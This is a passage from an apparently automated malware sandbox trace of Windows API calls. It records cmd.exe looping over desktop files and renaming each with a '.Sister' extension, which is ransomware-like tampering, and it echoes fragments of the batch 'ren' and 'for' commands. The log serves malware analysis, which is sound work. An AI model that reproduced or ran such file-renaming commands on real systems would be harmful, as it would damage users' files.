(HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956dad0) returned 0x490 [0180.287] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0180.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.287] GetFileType (hFile=0x50) returned 0x2 [0180.288] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0180.288] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0180.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.363] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0180.438] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0180.438] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0180.438] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0180.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.438] GetFileType (hFile=0x50) returned 0x2 [0180.438] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0180.438] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0180.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.511] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0180.589] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.589] GetFileType (hFile=0x50) returned 0x2 [0180.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0180.589] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0180.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.736] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956daa0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed956daa0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0180.811] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0180.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.811] GetFileType (hFile=0x50) returned 0x2 [0180.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0180.811] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0180.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.903] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0180.978] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0180.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.978] GetFileType (hFile=0x50) returned 0x2 [0180.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0180.978] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0181.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0181.096] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0181.205] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0181.349] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0181.349] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0181.349] malloc (_Size=0xffce) returned 0x21ed967fe80 [0181.349] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0181.349] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0181.349] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0181.350] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0181.350] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0181.350] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0181.350] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0181.350] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0181.350] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0181.350] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0181.350] ??_V@YAXPEAX@Z () returned 0x1 [0181.350] GetProcessHeap () returned 0x21ed8c70000 [0181.350] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937c0c0 [0181.350] GetProcessHeap () returned 0x21ed8c70000 [0181.350] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937c0c0, Size=0x130) returned 0x21ed937c0c0 [0181.350] GetProcessHeap () returned 0x21ed8c70000 [0181.350] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c0c0) returned 0x130 [0181.350] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.350] malloc (_Size=0xffce) returned 0x21ed967fe80 [0181.350] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0181.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.351] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed967fe80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0181.352] ??_V@YAXPEAX@Z () returned 0x1 [0181.352] GetProcessHeap () returned 0x21ed8c70000 [0181.352] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6be30 [0181.353] GetProcessHeap () returned 0x21ed8c70000 [0181.353] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937bb70 [0181.353] GetProcessHeap () returned 0x21ed8c70000 [0181.353] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937bb70, Size=0x130) returned 0x21ed937bb70 [0181.353] GetProcessHeap () returned 0x21ed8c70000 [0181.353] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937bb70) returned 0x130 [0181.353] malloc (_Size=0xffce) returned 0x21ed967fe80 [0181.353] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0181.353] GetProcessHeap () returned 0x21ed8c70000 [0181.353] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d655e0 [0181.353] GetProcessHeap () returned 0x21ed8c70000 [0181.353] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9559e80 [0181.353] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0181.354] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0181.354] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0181.354] GetLastError () returned 0x2 [0181.354] GetProcessHeap () returned 0x21ed8c70000 [0181.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9980080 [0181.354] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9980090 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0181.354] SetErrorMode (uMode=0x0) returned 0x0 [0181.354] SetErrorMode (uMode=0x1) returned 0x0 [0181.354] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed967fe80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0181.354] SetErrorMode (uMode=0x0) returned 0x1 [0181.355] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0181.355] GetProcessHeap () returned 0x21ed8c70000 [0181.355] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955bbc0 [0181.355] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0181.355] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0181.355] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0181.355] GetLastError () returned 0x2 [0181.373] ??_V@YAXPEAX@Z () returned 0x1 [0181.374] malloc (_Size=0xffce) returned 0x21ed967fe80 [0181.374] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0181.374] malloc (_Size=0xffce) returned 0x21ed968fe60 [0181.374] ??_V@YAXPEAX@Z () returned 0x21ed968fe60 [0181.374] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0181.374] GetLastError () returned 0x2 [0181.374] _get_osfhandle (_FileHandle=2) returned 0x54 [0181.374] GetFileType (hFile=0x54) returned 0x2 [0181.374] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0181.374] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0181.465] _get_osfhandle (_FileHandle=2) returned 0x54 [0181.465] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0181.558] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0181.559] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0181.559] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0181.667] longjmp () [0181.667] ??_V@YAXPEAX@Z () returned 0x1 [0181.667] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9266f20, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0xa269cc90, ftLastAccessTime.dwHighDateTime=0x1d5ef5c, ftLastWriteTime.dwLowDateTime=0xa269cc90, ftLastWriteTime.dwHighDateTime=0x1d5ef5c, nFileSizeHigh=0x0, nFileSizeLow=0xb7a5, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="vkmlI37o0H7OT_ Ymw.bmp", cAlternateFileName="")) returned 1 [0181.667] GetProcessHeap () returned 0x21ed8c70000 [0181.667] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955cfa0, Size=0x458) returned 0x21ed8d6c130 [0181.667] GetProcessHeap () returned 0x21ed8c70000 [0181.667] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c130) returned 0x458 [0181.667] GetProcessHeap () returned 0x21ed8c70000 [0181.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956df70 [0181.667] GetProcessHeap () returned 0x21ed8c70000 [0181.667] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956df70, Size=0x30) returned 0x21ed956df70 [0181.667] GetProcessHeap () returned 0x21ed8c70000 [0181.667] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956df70) returned 0x30 [0181.668] GetProcessHeap () returned 0x21ed8c70000 [0181.668] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956dfb0 [0181.668] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0181.669] GetProcessHeap () returned 0x21ed8c70000 [0181.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8d6eb80 [0181.669] ??_V@YAXPEAX@Z () returned 0x1 [0181.669] GetProcessHeap () returned 0x21ed8c70000 [0181.669] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956dfb0, Size=0x1e0) returned 0x21ed956dfb0 [0181.669] GetProcessHeap () returned 0x21ed8c70000 [0181.669] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956dfb0) returned 0x1e0 [0181.669] GetProcessHeap () returned 0x21ed8c70000 [0181.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956e1a0 [0181.670] GetProcessHeap () returned 0x21ed8c70000 [0181.670] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956e1a0, Size=0x290) returned 0x21ed956e1a0 [0181.670] GetProcessHeap () returned 0x21ed8c70000 [0181.670] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956e1a0) returned 0x290 [0181.670] GetProcessHeap () returned 0x21ed8c70000 [0181.670] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956e440 [0181.670] GetProcessHeap () returned 0x21ed8c70000 [0181.670] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956e440, Size=0x30) returned 0x21ed956e440 [0181.670] GetProcessHeap () returned 0x21ed8c70000 [0181.670] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956e440) returned 0x30 [0181.670] GetProcessHeap () returned 0x21ed8c70000 [0181.670] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956e480 [0181.670] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0181.670] GetProcessHeap () returned 0x21ed8c70000 [0181.670] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8d6e8b0 [0181.670] ??_V@YAXPEAX@Z () returned 0x1 [0181.670] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0181.670] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d651c0 [0181.671] FindClose (in: hFindFile=0x21ed8d651c0 | out: hFindFile=0x21ed8d651c0) returned 1 [0181.671] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64b00 [0181.671] FindClose (in: hFindFile=0x21ed8d64b00 | out: hFindFile=0x21ed8d64b00) returned 1 [0181.671] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x960eac97, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x960eac97, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64b60 [0181.671] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0181.671] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vkmlI37o0H7OT_ Ymw.bmp", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9266f20, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0xa269cc90, ftLastAccessTime.dwHighDateTime=0x1d5ef5c, ftLastWriteTime.dwLowDateTime=0xa269cc90, ftLastWriteTime.dwHighDateTime=0x1d5ef5c, nFileSizeHigh=0x0, nFileSizeLow=0xb7a5, dwReserved0=0x4, dwReserved1=0x80, cFileName="vkmlI37o0H7OT_ Ymw.bmp", cAlternateFileName="VKMLI3~1.BMP")) returned 0x21ed8d64a40 [0181.671] FindClose (in: hFindFile=0x21ed8d64a40 | out: hFindFile=0x21ed8d64a40) returned 1 [0181.671] _wcsnicmp (_String1="VKMLI3~1.BMP", _String2="vkmlI37o0H7OT_ Ymw.bmp", _MaxCount=0x16) returned 71 [0181.671] malloc (_Size=0x1ff9c) returned 0x21ed969fe40 [0181.672] ??_V@YAXPEAX@Z () returned 0x21ed969fe40 [0181.673] GetProcessHeap () returned 0x21ed8c70000 [0181.673] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed937adf0 [0181.673] ??_V@YAXPEAX@Z () returned 0x1 [0181.673] ??_V@YAXPEAX@Z () returned 0x1 [0181.673] GetProcessHeap () returned 0x21ed8c70000 [0181.673] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956e480, Size=0x1e0) returned 0x21ed956e480 [0181.673] GetProcessHeap () returned 0x21ed8c70000 [0181.673] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956e480) returned 0x1e0 [0181.674] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0181.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0181.674] GetFileType (hFile=0x50) returned 0x2 [0181.674] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0181.674] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0181.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0181.807] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0181.978] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0181.978] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0181.978] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0181.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0181.978] GetFileType (hFile=0x50) returned 0x2 [0181.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0181.978] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0182.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.049] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0182.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.188] GetFileType (hFile=0x50) returned 0x2 [0182.188] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0182.188] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0182.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.261] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956df80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed956df80*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0182.335] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"vkmlI37o0H7OT_ Ymw.bmp\" \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" ") returned 58 [0182.335] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.335] GetFileType (hFile=0x50) returned 0x2 [0182.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0182.335] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0182.418] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.418] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0182.491] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0182.491] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.491] GetFileType (hFile=0x50) returned 0x2 [0182.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0182.491] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0182.599] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.599] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0182.672] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0182.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.673] GetFileType (hFile=0x50) returned 0x2 [0182.673] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0182.673] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0182.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.742] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0182.819] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0182.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.819] GetFileType (hFile=0x50) returned 0x2 [0182.819] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0182.819] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0182.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.906] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0182.979] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0182.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0182.979] GetFileType (hFile=0x50) returned 0x2 [0182.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0182.979] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0183.199] _get_osfhandle (_FileHandle=1) returned 0x50 [0183.199] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 